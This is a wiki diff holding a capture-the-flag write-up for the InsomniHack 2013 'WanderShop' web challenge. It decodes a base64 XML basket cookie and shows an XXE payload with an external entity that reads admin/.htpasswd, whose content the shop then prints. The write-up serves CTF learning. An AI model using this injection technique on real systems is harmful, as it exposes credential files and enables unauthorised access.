Difference between revisions of "InsomniHack-2013/Web2/WanderShop"
From Fixme.ch
(Created page with "== Summary == * If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolut...") |
|||
| Line 3: | Line 3: | ||
* Could you break into his shop and get us as many items as you can? | * Could you break into his shop and get us as many items as you can? | ||
* '''Goal : Access the admin page''' | * '''Goal : Access the admin page''' | ||
| + | |||
| + | == Solution == | ||
| + | *The admin page is protected with http auth on /admin | ||
| + | *The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded. | ||
| + | <pre> | ||
| + | In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D' | ||
| + | |||
| + | In [12]: print base64.decodestring(urllib2.unquote(a)) | ||
| + | <?xml version="1.0"?> | ||
| + | <basket> | ||
| + | <item type="5" name="Sword">5</item> | ||
| + | <item type="4" name="Knife">4</item> | ||
| + | </basket> | ||
| + | </pre> | ||
| + | * We can then inject XML with the cookie, we use external entities which allow to manipulate local files and display the result in the XML | ||
| + | <pre> | ||
| + | <!DOCTYPE basket | ||
| + | [ | ||
| + | <!ENTITY item SYSTEM "admin/.htpasswd"> | ||
| + | ]> | ||
| + | <basket> | ||
| + | <item type="5" name="asd">&item;</item> | ||
| + | </basket> | ||
| + | </pre> | ||
| + | * The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table. | ||
Revision as of 13:42, 26 March 2013
Summary
- If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this.
- Could you break into his shop and get us as many items as you can?
- Goal : Access the admin page
Solution
- The admin page is protected with http auth on /admin
- The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded.
In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D'
In [12]: print base64.decodestring(urllib2.unquote(a))
<?xml version="1.0"?>
<basket>
<item type="5" name="Sword">5</item>
<item type="4" name="Knife">4</item>
</basket>
- We can then inject XML with the cookie, we use external entities which allow to manipulate local files and display the result in the XML
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
- The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
